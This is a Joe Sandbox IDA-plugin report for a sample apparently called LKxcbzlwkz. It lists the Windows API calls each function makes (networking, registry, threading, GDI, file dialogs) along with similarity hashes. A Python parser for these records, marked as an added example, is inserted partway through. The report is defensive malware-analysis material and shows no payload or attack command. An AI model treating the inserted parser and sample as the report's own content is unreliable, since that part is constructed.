• Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9

APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
• Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
• Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
• Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18

APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
• EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
• _memmove.LIBCMT ref: 0044B555
• _memmove.LIBCMT ref: 0044B578
• LeaveCriticalSection.KERNEL32(?), ref: 0044B587
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
• String ID:
• API String ID: 2737351978-0
• Opcode ID: 0c541d96d6d6ada21947550f918e4a5920fd6bf4dd483e11ebc527f87b3cbbe1
• Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
• Opcode Fuzzy Hash: 0c541d96d6d6ada21947550f918e4a5920fd6bf4dd483e11ebc527f87b3cbbe1
• Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58

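The function records above all follow one fixed layout (an "APIs" list of "Name.MODULE(args), ref: ADDR" lines, with callee-inherited calls marked "Part of subcall function", followed by "Memory Dump Source" and "Similarity" fields). That regularity makes them easy to parse, which is what you want when hunting for a specific call pattern or pivoting on an Instruction Fuzzy Hash across several reports. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin; SAMPLE is copied from two of the records on this page, and the field names are the ones the report prints.

```python
"""Parse Joe Sandbox IDA-plugin function records ("APIs" / "Memory Dump
Source" / "Similarity" blocks as printed above) into structured objects.
Added example, not part of the report; SAMPLE is copied from this page."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One "• Name.MODULE(args), ref: ADDR" line. Calls made inside a callee are
# listed as "Part of subcall function ADDR:" and are inherited, not direct.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[\w@$?]+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# Generic "• Key: value" line (Similarity, Memory Dump Source, Snapshot File).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
SECTION_HEADERS = {"Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # callee that actually makes the call


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)
    associated: List[str] = field(default_factory=list)

    def direct_apis(self) -> List[str]:
        """API names called by this function itself, in listed order."""
        return [c.name for c in self.apis if c.subcall_of is None]

    @property
    def instruction_fuzzy_hash(self) -> str:
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per "APIs" block; text before the first is ignored."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_RE.match(raw)
            if m:
                args = m["args"].split(",") if m["args"] else []
                current.apis.append(ApiCall(
                    m["name"], m["module"], args, int(m["ref"], 16),
                    int(m["sub"], 16) if m["sub"] else None))
                continue
        m = FIELD_RE.match(raw)
        if m and m["key"] == "Associated":
            current.associated.append(m["val"])
        elif m:
            current.fields[m["key"]] = m["val"]
    return records


def functions_calling(records, api_name, include_subcalls=False):
    """Records whose function reaches api_name directly (or via a callee)."""
    return [r for r in records if any(
        c.name == api_name and (include_subcalls or c.subcall_of is None)
        for c in r.apis)]


# Constructed sample: the list-view colouring function and the
# ReadFile/critical-section reader, copied from the records above.
SAMPLE = """\
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
• EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
• _memmove.LIBCMT ref: 0044B555
• _memmove.LIBCMT ref: 0044B578
• LeaveCriticalSection.KERNEL32(?), ref: 0044B587
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
• String ID:
• API String ID: 2737351978-0
• Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.instruction_fuzzy_hash[:16], " -> ".join(rec.direct_apis()))
```

Keeping direct and inherited calls apart matters when you grep these records: a function listed with DeleteObject only "as part of subcall" does not itself import GDI32, so a Yara or API-sequence rule built from the direct list will not over-match on it. Feed the whole report text to parse_records and index the results by instruction_fuzzy_hash to pivot between samples.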
APIs
• ___set_flsgetvalue.LIBCMT ref: 0041523A
• __calloc_crt.LIBCMT ref: 00415246
• __getptd.LIBCMT ref: 00415253
• CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
• _free.LIBCMT ref: 0041529E
• __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3638380555-0
                                                                                                                                                                                                                                                            • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                                                                                                                                                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                                                                                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                                                                                                                                            • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 004656CA
                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2945290962-0
                                                                                                                                                                                                                                                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                                                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1457242333-0
                                                                                                                                                                                                                                                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                                                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15295421-0
                                                                                                                                                                                                                                                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                                                                                                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                            • API String ID: 780548581-3081909835
                                                                                                                                                                                                                                                            • Opcode ID: 5378e8049ee2a95257be1467db38ea41a0f606468867fb51d90dd075906198f3
                                                                                                                                                                                                                                                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5378e8049ee2a95257be1467db38ea41a0f606468867fb51d90dd075906198f3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                                                                                                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                                                                                                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                                                                                                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4082120231-0
                                                                                                                                                                                                                                                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                                                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
